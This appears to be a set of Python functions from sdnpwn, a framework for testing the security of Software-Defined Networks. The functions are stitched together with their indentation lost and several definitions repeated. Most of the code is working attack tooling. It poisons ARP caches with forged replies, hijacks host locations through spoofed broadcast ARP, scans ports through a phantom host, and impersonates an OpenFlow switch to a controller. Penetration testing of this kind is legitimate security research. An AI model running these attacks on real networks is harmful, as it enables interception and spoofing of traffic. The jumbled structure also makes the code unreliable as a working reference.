def arpCachePoison(interface, vicIP, vicMAC, targetIP, newMac, thisHostIP,
thisHostMAC, loop, loopDelay):
global poisoningComplete
global haltPoisoning
poisoningComplete = False
haltPoisoning = False
sdnpwn.message("Sending gratuitous ARP for legitimate host to " + vicIP,
sdnpwn.NORMAL)
sendp(
Ether(src=thisHostMAC, dst=vicMAC) /
ARP(hwsrc=thisHostMAC, pdst=thisHostIP))
sleep(
2
) #Need to wait to ensure that the flow has been installed on the switches
sdnpwn.message("Poisoning target " + vicIP, sdnpwn.NORMAL)
malARP = (Ether(src=thisHostMAC, dst=vicMAC) /
ARP(op=ARP.is_at, psrc=targetIP, hwsrc=newMac, pdst=targetIP))
if (loop == True):
while (haltPoisoning == False):
sendp(malARP)
sleep(loopDelay)
poisoningComplete = True
else:
sendp(malARP)
poisoningComplete = True
def handleFlowMod(device, header, body, verbose):
if(verbose):
print("Got FlowMod")
flowMod = FlowMod()
flowMod.unpack(body)
flow = Flow(match=flowMod.match, cookie=flowMod.cookie,
idle_timeout=flowMod.idle_timeout, hard_timeout=flowMod.hard_timeout,
priority=flowMod.priority, buffer_id=flowMod.buffer_id, out_port=flowMod.out_port,
flags=flowMod.flags, actions=flowMod.actions
)
if(flowMod.command == FlowModCommand.OFPFC_ADD):
sdnpwn.message("Adding New Flow ", sdnpwn.NORMAL)
device.switch_flows[str(flow.cookie)] = flow
elif(flowMod.command == FlowModCommand.OFPFC_MODIFY):
sdnpwn.message("Modifying Flow ", sdnpwn.NORMAL)
device.switch_flows[str(flow.cookie)] = flow
elif(flowMod.command == FlowModCommand.OFPFC_MODIFY_STRICT):
sdnpwn.message("Modifying Flow (Strict) ", sdnpwn.NORMAL)
device.switch_flows[str(flow.cookie)] = flow
elif(flowMod.command == FlowModCommand.OFPFC_DELETE):
sdnpwn.message("Deleting Flow ", sdnpwn.NORMAL)
if(flow.cookie == 0):
device.switch_flows = {}
else:
del device.switch_flows[str(flow.cookie)]
elif(flowMod.command == FlowModCommand.OFPFC_DELETE_STRICT):
sdnpwn.message("Deleting Flow (Strict) ", sdnpwn.NORMAL)
if(flow.cookie == 0):
device.switch_flows = {}
else:
del device.switch_flows[str(flow.cookie)]
print(flow.toString())
def prepForScan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC,
phantomIP, phantomMAC):
global scanPrepped
global poisoningThread
sdnpwn.message("Inserting entery for Phantom Host in target ARP cache...",
sdnpwn.NORMAL)
sdnpwn.message(
"Sending SYN from Phantom (" + phantomIP + ") to " + targetIP,
sdnpwn.NORMAL)
sendTCPSYN(interface, targetIP, targetMAC, getUniqueNum(), phantomIP,
thisHostMAC, getUniqueNum(), getUniqueNum())
sdnpwn.message("Waiting for ARP request for Phantom (" + phantomIP + ")",
sdnpwn.NORMAL)
sniff(iface=interface, filter="arp and host " + targetIP, store=0, count=1)
sdnpwn.message("Done. IP should be in cache", sdnpwn.SUCCESS)
scanPrepped = True
try:
if (poisoningThread == None):
poisoningThread = Thread(target=dpap.arpCachePoison,
args=(interface, targetIP, targetMAC,
phantomIP, phantomMAC, thisHostIP,
thisHostMAC, True, 2)).start()
except Exception as e:
sdnpwn.message("Issue starting poisoning thread", sdnpwn.ERROR)
print(e)
exit(0)
def run(params):
global poisoningComplete
global haltPoisoning
poisoningComplete = False
haltPoisoning = False
signal.signal(signal.SIGINT, signal_handler)
iface = sdnpwn.getArg(["--iface", "-i"], params)
vIP = sdnpwn.getArg(["--victim", "-v"], params)
vMac = sdnpwn.getArg(["--victim-mac", "-vM"], params)
targetIP = sdnpwn.getArg(["--target-ip", "-t"], params)
newMac = sdnpwn.getArg(["--mac", "-m"], params)
loop = sdnpwn.checkArg(["--loop", "-l"], params)
loopDelay = sdnpwn.getArg(["--delay", "-d"], params, 1)
if (vMac == None):
vMac = sdnpwn.getTargetMacAddress(iface, vIP)
if (vIP == None or vMac == None or targetIP == None or newMac == None):
print(info())
print(usage())
return
thisHostIP = sdnpwn.getIPAddress(iface)
thisHostMAC = sdnpwn.getMacAddress(iface)
if ((thisHostIP == '0') or (thisHostMAC == '0')):
sdnpwn.message("Invalid interface", sdnpwn.ERROR)
return
arpCachePoison(iface, vIP, vMac, targetIP, newMac, thisHostIP, thisHostMAC,
loop, loopDelay)
def signal_handler(signal, frame):
global runningThreads
sdnpwn.message("Stopping...", sdnpwn.NORMAL)
dpap.stopPoisoning()
while (dpap.isPoisoningComplete() != True):
pass
runningThreads.remove(runningThreads[1])
runningThreads.remove(runningThreads[0])
def hijackHostLocation(iface, ip, vicMac):
if(vicMac == ""):
sdnpwn.message("Could not get MAC address for host " + ip, sdnpwn.ERROR)
return False
malARP = (Ether(src=vicMac, dst="FF:FF:FF:FF:FF:FF")/ARP(op=ARP.is_at, psrc=ip, hwsrc=vicMac, pdst=ip))
sendp(malARP)
return True
def run(params):
sdnpwn.message("Module template created!", sdnpwn.SUCCESS)
sdnpwn.message("Module template created!", sdnpwn.WARNING)
sdnpwn.message("Module template created!", sdnpwn.ERROR)
sdnpwn.message("Module template created!", sdnpwn.NORMAL)
sdnpwn.message("Module template created!", sdnpwn.VERBOSE)
print("Params are:")
print(params)
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
def signal_handler(signal, frame):
#Handle Ctrl+C here
print("")
sdnpwn.message("Stopping...Try Ctrl+C once more", sdnpwn.NORMAL)
try:
stopListening = True
for s in socks:
s.close()
except:
pass
exit(0)
def run(params):
if (len(params) > 1):
params.pop(0)
try:
call(params)
except:
com.message("Problem executing command. May require Root.",
com.ERROR)
return
else:
print(info())
print(usage())
def run(params):
global haltHijackHostLocation
haltHijackHostLocation = False
signal.signal(signal.SIGINT, signal_handler)
iface = ""
target = ""
loop = False
loopDelay = 1
if ("--iface" in params):
iface = params[params.index("--iface") + 1]
if ("--target" in params):
target = params[params.index("--target") + 1]
if ("--loop" in params):
loop = True
if ("--delay" in params):
loopDelay = params[params.index("--delay") + 1]
targets = []
if (target == ""):
print(info())
print(usage())
return
else:
thisHostIP = sdnpwn.getIPAddress(iface)
startIndex = 0
endIndex = 1
if ("/" in target):
targets = ip_network(target)
startIndex = 1
endIndex = targets.num_addresses - 2
else:
targets = ip_network(str(target) + "/32")
for host in range(startIndex, endIndex):
targetHost = targets[host].exploded
vicMac = sdnpwn.getTargetMacAddress(iface, targetHost)
sdnpwn.message(
"Hijacking location of host " + targetHost + " (" + vicMac +
")", sdnpwn.NORMAL)
if (loop == True):
while (haltHijackHostLocation is not True):
hijackHostLocation(iface, thisHostIP, vicMac)
sleep(loopDelay)
else:
hijackHostLocation(iface, thisHostIP, vicMac)
def getPorts(port):
if (port == None):
sdnpwn.message("No ports given, using 6633,6634, and 6653.",
sdnpwn.NORMAL)
ports = [6633, 6634, 6653]
elif ("," in port):
ports = port.split(",")
elif ("-" in port):
ports = []
for p in range(int(port.split("-")[0]), int(port.split("-")[1]) + 1):
ports.append(p)
else:
ports.append(port)
return ports
def run(params):
intf = sdnpwn.getArg(["--iface", "-i"], params)
mode = sdnpwn.getArg(["--mode", "-m"], params)
if ((mode != None) and (intf != None)):
pktHandler = packetHandler()
pktHandler.mode = mode
sdnpwn.message("Starting sniffer on interface " + intf + "\n",
sdnpwn.NORMAL)
signal.signal(signal.SIGINT, signal_handler)
sniff(iface=intf, prn=pktHandler.packetIn)
else:
print(info())
print(usage())
def run(params):
if (len(params) == 1):
com.message("No module name given!", com.ERROR)
else:
#try:
params.pop(0)
for m in params:
try:
m = m.replace("-", "_")
mod = imp.load_source(m, "modules/" + m + ".py")
com.message("Module Name: " + m, com.NORMAL)
com.message("Description: " + mod.info(), com.NORMAL)
com.message("Usage:", com.NORMAL)
print(mod.usage())
except IOError:
com.message("Module " + m + " does not exist!", com.ERROR)
def scan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC, phantomIP,
phantomMAC, targetPort):
global scanPrepped
if (scanPrepped == None or scanPrepped == False):
prepForScan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC,
phantomIP, phantomMAC)
sourcePort = getUniqueNum()
tcpSeqNum = getUniqueNum()
sniffingThread = Thread(target=listen,
args=(interface, targetIP, targetMAC, targetPort,
phantomIP, sourcePort, tcpSeqNum)).start()
sleep(1)
sdnpwn.message("Checking Port " + targetPort, sdnpwn.NORMAL)
sendTCPSYN(interface, targetIP, targetMAC, targetPort, phantomIP,
thisHostMAC, sourcePort, tcpSeqNum)
def run(params):
if (len(params) == 1 or "-l" in params):
printModules(None)
if ("-n" in params):
try:
templateName = "module_base_template"
newModName = params[params.index("-n") + 1]
if (newModName in getModuleList()):
sdnpwn.message("Module already exists!", sdnpwn.WARNING)
return
if ("-t" in params):
templateName = params[params.index("-t") + 1]
subprocess.call([
"cp", "modules/" + templateName.replace("-", "_") + ".py",
"modules/" + newModName.replace("-", "_") + ".py"
])
except:
sdnpwn.message("Could not create new module", sdnpwn.ERROR)
if ("-s" in params):
try:
searchString = params[params.index("-s") + 1]
printModules(searchString)
except:
sdnpwn.message("Error searching for module", sdnpwn.ERROR)
if ("-r" in params):
try:
moduleName = params[params.index("-r") + 1]
confirm = input("Are you sure you would like to remove '" +
moduleName + "'? [y/n]: ")
if (confirm == "y"):
os.remove("modules/" + moduleName.replace("-", "_") + ".py")
try:
os.remove("modules/" + moduleName.replace("-", "_") +
".pyc")
except:
pass
sdnpwn.message("Module '" + moduleName + "' removed.",
sdnpwn.WARNING)
except Exception as e:
sdnpwn.message("Error removing module", sdnpwn.ERROR)
print(e)
def printModules(searchString):
if (searchString is None):
sdnpwn.message("Available modules:", sdnpwn.SUCCESS)
for m in getModuleList():
sdnpwn.message("" + (m.split(".py")[0]).replace("_", "-"),
sdnpwn.NORMAL)
else:
sdnpwn.message("Available modules (Matching '" + searchString + "'):",
sdnpwn.SUCCESS)
for m in getModuleList():
if (searchString in m):
sdnpwn.message("" + (m.split(".py")[0]).replace("_", "-"),
sdnpwn.NORMAL)
def handlePacketOut(device, header, body, verbose):
if(verbose):
print("Got PacketOut")
packetOut = PacketOut()
packetOut.unpack(body)
tempFlow = Flow()
try:
pkt = Ether(packetOut.data.pack())
if(verbose):
print(Flow.actionsToString(actions))
pkt.show()
if(device.forward_packet_out_payload == True):
if(device.forward_packet_out_port_filter is not None):
if(("Port " + str(device.forward_packet_out_port_filter)) in tempFlow.actionsToString(packetOut.actions)):
sendp(pkt, iface=device.forward_packet_out_iface)
else:
sendp(pkt, iface=device.forward_packet_out_iface)
except Exception as e:
sdnpwn.message("Got error handling packet out.", sdnpwn.WARNING)
sdnpwn.message(str(e), sdnpwn.VERBOSE)
def activateRelaySocket(port):
global ofSwitch
hostname = socket.gethostbyname(socket.gethostname())
listenSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listenSock.bind(("0.0.0.0", port))
listenSock.listen(1)
data = b''
sdnpwn.message("[Relay Socket] Relay port open on port " + str(port) + "",
sdnpwn.NORMAL)
while 1:
try:
conn, addr = listenSock.accept()
msgHeader = conn.recv(8)
header = Header()
header.unpack(msgHeader)
sdnpwn.message(
"[Relay Socket] Got " + str(header.message_type) + " from " +
str(addr), sdnpwn.NORMAL)
msgBody = conn.recv(header.length - 8)
msgFull = header.pack() + msgBody
print(msgFull)
ofSwitch.comm_sock.send(msgFull)
except Exception as e:
sdnpwn.message("[Relay socket] Error handling message",
sdnpwn.WARNING)
print(e)
listenSock.close()
def run(params):
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
iface = sdnpwn.getArg(["--iface", "-i"], params)
count = sdnpwn.getArg(["--count", "-c"], params, 1)
if (sdnpwn.checkArg(["--capture", "-w"], params)):
outFile = sdnpwn.getArg(["--capture", "-w"], params)
frameHandler = FrameHandler(iface, outFile)
sdnpwn.message("Starting listener on interface " + iface,
sdnpwn.NORMAL)
sniff(iface=iface,
store=0,
prn=frameHandler.handler,
count=1,
filter="ether proto 0x88cc")
sdnpwn.message("LLDP frame saved to " + outFile, sdnpwn.SUCCESS)
elif (sdnpwn.checkArg(["--replay", "-r"], params)):
inFile = sdnpwn.getArg(["--replay", "-r"], params)
pkt = rdpcap(inFile)
for c in range(int(count)):
sendp(pkt, iface=iface)
sdnpwn.message("Replayed " + inFile + " " + str(count) + " times",
sdnpwn.SUCCESS)
def main():
if (len(sys.argv) == 1):
try:
mod = imp.load_source("help", "modules/help.py")
params = sys.argv.pop(0)
filter(None, params)
mod.run(params)
del mod
except IOError:
com.message("Error importing " + modName + " as a module.",
com.ERROR)
elif (len(sys.argv) > 1):
modName = sys.argv[1]
modName = modName.replace("-", "_")
params = sys.argv
filter(None, params)
params.pop(0)
try:
mod = imp.load_source(modName, "modules/" + modName + ".py")
mod.run(params)
del sys.modules[modName]
except IOError as e:
if (e == errno.EPERM):
com.message("Run as root!", com.ERROR)
except ImportError as e:
com.message("Error importing " + modName + " as a module.",
com.ERROR)
print(e)
def run(params):
cmd = ""
prompt = "$"
#Check for root and change prompt if user has root
if (os.geteuid() == 0):
prompt = "#"
else:
com.message("Root not detected. Some modules may be limited.",
com.WARNING)
while (cmd != "exit"):
signal.signal(signal.SIGINT, signal_handler)
cmd = input("\033[1msdnpwn" + prompt + " \033[0m")
if (cmd == "exit"):
com.message("Bye", com.NORMAL)
exit(0)
elif (cmd != ""):
params = cmd.split(" ")
cmd = params[0]
cmd = cmd.replace("-", "_")
try:
mod = imp.load_source(cmd, "modules/" + cmd + ".py")
filter(None, params)
mod.run(params)
del sys.modules[cmd]
imp.reload(signal)
imp.reload(com)
except InterruptedError as e:
print("Module interupted.")
except IOError as e:
if (e == errno.EPERM):
com.message("Run as root!", com.ERROR)
else:
com.message("Error importing " + cmd + " as a module.",
com.ERROR)
print(e)
except Exception as e:
com.message("Something went wrong!", com.ERROR)
print(e)
def loadConfiguration(self, config):
self.switch_vendor_id = config["vendor_id"]
self.switch_desc["switch_mfr_desc"] = config["description"]["manufacturer_description"]
self.switch_desc["switch_hw_desc"] = config["description"]["hardware_description"]
self.switch_desc["switch_sw_desc"] = config["description"]["software_description"]
self.switch_desc["switch_serial_num"] = config["description"]["serial_number"]
self.switch_desc["switch_dp_desc"] = config["description"]["dataplane_description"]
self.switch_features["dpid"] = config["features"]["dataplane_id"]
self.switch_features["no_of_buffers"] = config["features"]["number_of_buffers"]
self.switch_features["no_of_tables"] = config["features"]["number_of_tables"]
self.switch_features["capabilities"] = config["features"]["capabilities"]
self.switch_features["actions"] = config["features"]["actions"]
self.switch_features["ports"] = []
if(isinstance(config["ports"], list)):
for port in config["ports"]:
self.addPort(port["port_no"], port["hardware_address"], port["port_name"], port["port_config"], port["port_state"], port["port_curr"], port["port_advertised"], port["port_supported"], port["port_peer"]) #Need to add config options here
elif(isinstance(config["ports"], int)):
for i in range(config["ports"]):
self.addPort()
else:
sdnpwn.message("Could not load port config. Switch will have no ports.", sdnpwn.WARNING)
self.switch_stats["flow"] = config["stats"]["flow_stats"]
def testForSDN(testMethod, dstIP, count, interval):
global verbose
rtt = []
sentMS = 0
if (testMethod == "icmp"):
sdnpwn.message("Testing with ICMP", sdnpwn.NORMAL)
icmp = (IP(dst=dstIP) / ICMP())
for i in range(0, count):
sentMS = int(round(time.time() * 1000))
resp = sr1(icmp)
rtt.append((int(round(time.time() * 1000))) - sentMS)
time.sleep(interval)
elif (testMethod == "arp"):
sdnpwn.message("Testing with ARP", sdnpwn.NORMAL)
for i in range(0, count):
sentMS = int(round(time.time() * 1000))
resp = arping(dstIP)
rtt.append((int(round(time.time() * 1000))) - sentMS)
time.sleep(interval)
initValue = rtt[0]
rtt.pop(0)
#Perform T-Test to check if first latency value is significantly different from others in our sample
res = stats.ttest_1samp(rtt, initValue)
if (verbose == True):
sdnpwn.message("Initial RTT: " + str(initValue), sdnpwn.VERBOSE)
sdnpwn.message("RTTs for other traffic: " + str(rtt), sdnpwn.VERBOSE)
sdnpwn.message("Calculated p-value for inital RTT is " + str(res[1]),
sdnpwn.VERBOSE)
if (
res[1] < .05 and all(i < initValue for i in rtt)
): #If the p-value is less that 5% we can say that initValue is significant
return True
else:
return False
def run(params):
global ofSwitch
verbose = False
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
controllerIP = sdnpwn.getArg(["--controller", "-c"], params, "127.0.0.1")
controllerPort = sdnpwn.getArg(["--port", "-p"], params, 6633)
configFile = sdnpwn.getArg(["--config", "-r"], params)
packetOutForwardingIFace = sdnpwn.getArg(["--output-to", "-o"], params)
packetOutForwardingFilter = sdnpwn.getArg(["--output-filter", "-f"],
params)
if (sdnpwn.checkArg(["--listen", "-l"], params)):
rsPort = sdnpwn.getArg(["--listen", "-l"], params)
rsThread = threading.Thread(target=activateRelaySocket,
args=(int(rsPort), ))
rsThread.setDaemon(True)
rsThread.start()
verbose = sdnpwn.checkArg(["--verbose" "-v"], params)
if (configFile == ""):
sdnpwn.message(
"Please provide a switch configuration file using the --config option",
sdnpwn.ERROR)
return
configRaw = open(configFile, 'r')
config = ""
try:
config = json.load(configRaw)
except Exception as e:
sdnpwn.message(
"Could not read config as JSON file. Please check syntax.",
sdnpwn.ERROR)
sdnpwn.message(e, sdnpwn.VERBOSE)
config = config["of-switch"]
ofSwitch = of.OpenFlowSwitch()
ofSwitch.loadConfiguration(config)
ofSwitch.auto_handle_Messages = True
ofSwitch.enable_output = verbose
if (packetOutForwardingIFace is not None):
ofSwitch.forward_packet_out_payload = True
ofSwitch.forward_packet_out_iface = packetOutForwardingIFace
if (packetOutForwardingFilter is not None):
ofSwitch.forward_packet_out_port_filter = packetOutForwardingFilter
ofSwitch.connect(controllerIP, int(controllerPort))
def packetHandler(
pkt): #This is the function scapy will use as the callback
if (TCP in pkt):
if (pkt[IP].src == targetIP and pkt[TCP].dport == sourcePort):
flags = getFlags(pkt[TCP].flags)
if (flags == "SA"):
sdnpwn.message("Port " + targetPort + " open",
sdnpwn.SUCCESS)
elif (flags == "RA"):
sdnpwn.message("Port " + targetPort + " closed",
sdnpwn.ERROR)
else:
sdnpwn.message(
"Got flags " + flags + " for port " + targetPort,
sdnpwn.WARNING)
return
def signal_handler(signal, frame):
print("")
com.message("Bye", com.NORMAL)
sys.exit(0)
def signal_handler(signal, frame):
#Handle Ctrl+C here
print("")
sdnpwn.message("Stopping...", sdnpwn.NORMAL)
return
def run(params):
print("")
print("")
print('''
_
| |
___ __| |_ __ _ ____ ___ __
/ __|/ _` | '_ \| '_ \ \ /\ / / '_ \
\__ \ (_| | | | | |_) \ V V /| | | |
|___/\__,_|_| |_| .__/ \_/\_/ |_| |_|
| |
|_|
''')
print("Author: Dylan Smyth")
print("Site: https://sdnpwn.net")
print("Version: 1.7.0 ")
print("")
sdnpwn.message(" What is sdnpwn? ", sdnpwn.SUCCESS)
print(
"sdnpwn is a toolkit and framework for testing the security of Software-Defined Networks (SDNs)."
)
print("")
sdnpwn.message("Usage", sdnpwn.SUCCESS)
print(
'''Functionality in sdnpwn is divided into different modules. Each attack or attack type is available from a certain module.
Modules can be executed like so:
./sdnpwn.py <module name> <module options>
The mods module can be used to list all available modules:
./sdnpwn.py mods
More information about a certain module can be accessed using the info module:
./sdnpwn.py info mods
The above command would retrieve more information about the mods module, such as a description and available options.'''
)
print("")
sdnpwn.message("Creating and managing modules", sdnpwn.SUCCESS)
print(
'''Many sdnpwn modules use functionality from other modules. Each sdnpwn module is a Python module in itself so modules can be imported and functionality accessed. New modules can be created using the following command:
./sdnpwn.py mods -n <new module name>
Running the above command will create a new sdnpwn module from a template.
Modules can be removed with the following command:
./sdnpwn.py mods -r <module name>''')
print("")
sdnpwn.message("Further Information", sdnpwn.SUCCESS)
print(
"Check out https://sdnpwn.net for articles and tutorials on using various sdnpwn modules and the attacks they use."
)
print("")
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
def run(params):
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
appDir = sdnpwn.getArg(["-b", "--build"], params, None)
doConfig = sdnpwn.checkArg(["-c", "--configure"], params)
if(appDir == None):
sdnpwn.message("No app directory specified", sdnpwn.ERROR)
return
if(doConfig):
try:
with open(appDir + "/sdnpwn_options", 'r+') as confFile:
#confFile = open(appDir + "/sdnpwn_options", 'r+')
confOut = ""
for l in confFile.readlines():
conf = l.split("=")
confVal = input(conf[0] + " [" + conf[1].replace("\n","") + "]: ") or conf[1].replace("\n","")
confOut += conf[0] + "=" + confVal + "\n"
confFile.seek(0)
confFile.write(confOut)
except Exception as e:
sdnpwn.printWarning("Error while setting configuration!")
print(e)
return
sdnpwn.printNormal("Building " + appDir)
buildDir = appDir + "-building-temp"
try:
shutil.copytree(appDir, buildDir)
config= {}
with open(buildDir + "/sdnpwn_options", 'r') as confFile:
for l in confFile.readlines():
conf = l.split("=")
config[conf[0]] = conf[1].replace("\n","")
sdnpwn.printNormal("Got configuration")
with open(buildDir + "/pom.xml", 'r+') as pomFile:
pomFileData = pomFile.read()
pomFile.seek(0)
for k in config.keys():
pomFileData = pomFileData.replace(k, config[k])
pomFile.write(pomFileData)
javaFilesLocation = buildDir + "/src/main/java/org/onosproject/app/"
javaFiles = [f for f in listdir(javaFilesLocation) if isfile(join(javaFilesLocation, f))]
for j in javaFiles:
#with open(javaFilesLocation + j, 'r+') as javaFile:
#javaFileData = javaFile.read()
#javaFile.seek(0)
#Above method won't overwrite the whole file for some reason. Should check out why.
javaFile = open(javaFilesLocation + j, 'r')
javaFileData = javaFile.read()
javaFile.close()
for k in config.keys():
javaFileData = javaFileData.replace(k, config[k])
javaFile = open(javaFilesLocation + j, 'w')
javaFile.write(javaFileData)
javaFile.close()
sdnpwn.printSuccess("Files updated with configuration")
sdnpwn.printNormal("Compiling app with maven")
call(['mvn', '-f', buildDir, 'clean', 'install'])
shutil.copy(buildDir + "/target/" + config["$APP_NAME"] + "-1.0-SNAPSHOT.oar", "apps/compiled_apps/")
shutil.copy(buildDir + "/target/" + config["$APP_NAME"] + "-1.0-SNAPSHOT.jar", "apps/compiled_apps/")
sdnpwn.printSuccess("OAR and JAR file moved to apps/compiled_apps")
if(sdnpwn.checkArg(["-k", "--keep-source"], params)):
shutil.copytree(buildDir, appDir + "-" + str(datetime.datetime.now()).split(" ")[0])
sdnpwn.printNormal("App source saved in " + appDir + "-" + str(datetime.datetime.now()).split(" ")[0])
except Exception as e:
sdnpwn.printError("Error building " + appDir)
print(e)
finally:
shutil.rmtree(buildDir)
def run(params):
global scanPrepped
scanPrepped = False
conf.verb = 0 #Set scapy verbose mode off
signal.signal(signal.SIGINT, signal_handler)
interface = None
targetIP = None
targetMAC = None
targetPort = None
phantomIP = None
phantomMAC = None
if ("--iface" in params):
interface = params[params.index("--iface") + 1]
if ("--target-ip" in params):
targetIP = params[params.index("--target-ip") + 1]
if ("--target-mac" in params):
targetMAC = params[params.index("--target-mac") + 1]
if ("--ports" in params):
targetPort = params[params.index("--ports") + 1]
if ("--phantom-ip" in params):
phantomIP = params[params.index("--phantom-ip") + 1]
if ("--phantom-mac" in params):
phantomMAC = params[params.index("--phantom-mac") + 1]
if (interface == None or targetIP == None or targetPort == None
or phantomIP == None):
print(info())
print(usage())
return
if (targetMAC == None):
sdnpwn.message("Sending ARP request for target MAC", sdnpwn.NORMAL)
targetMAC = sdnpwn.getTargetMacAddress(interface, targetIP)
sdnpwn.message("Got target MAC: " + targetMAC, sdnpwn.NORMAL)
if (phantomMAC == None):
phantomMAC = sdnpwn.generateRandomMacAddress()
sdnpwn.message("Generated Phantom host MAC: " + phantomMAC,
sdnpwn.NORMAL)
targetPorts = targetPort.split(",")
sourcePort = getUniqueNum()
tcpSeqNum = getUniqueNum()
thisHostIP = sdnpwn.getIPAddress(interface)
thisHostMAC = sdnpwn.getMacAddress(interface)
if ((thisHostIP == '0') or (thisHostMAC == '0')):
sdnpwn.message("Invalid interface", sdnpwn.ERROR)
exit(0)
prepForScan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC,
phantomIP, phantomMAC)
while (dpap.isPoisoningComplete() == False):
sleep(2)
sdnpwn.message("Waiting for poisoning to complete...", sdnpwn.NORMAL)
sdnpwn.message("Starting port scan", sdnpwn.SUCCESS)
for p in targetPorts:
scan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC,
phantomIP, phantomMAC, p)
sleep(2)
sdnpwn.message("Finishing up...", sdnpwn.NORMAL)
dpap.stopPoisoning()
return
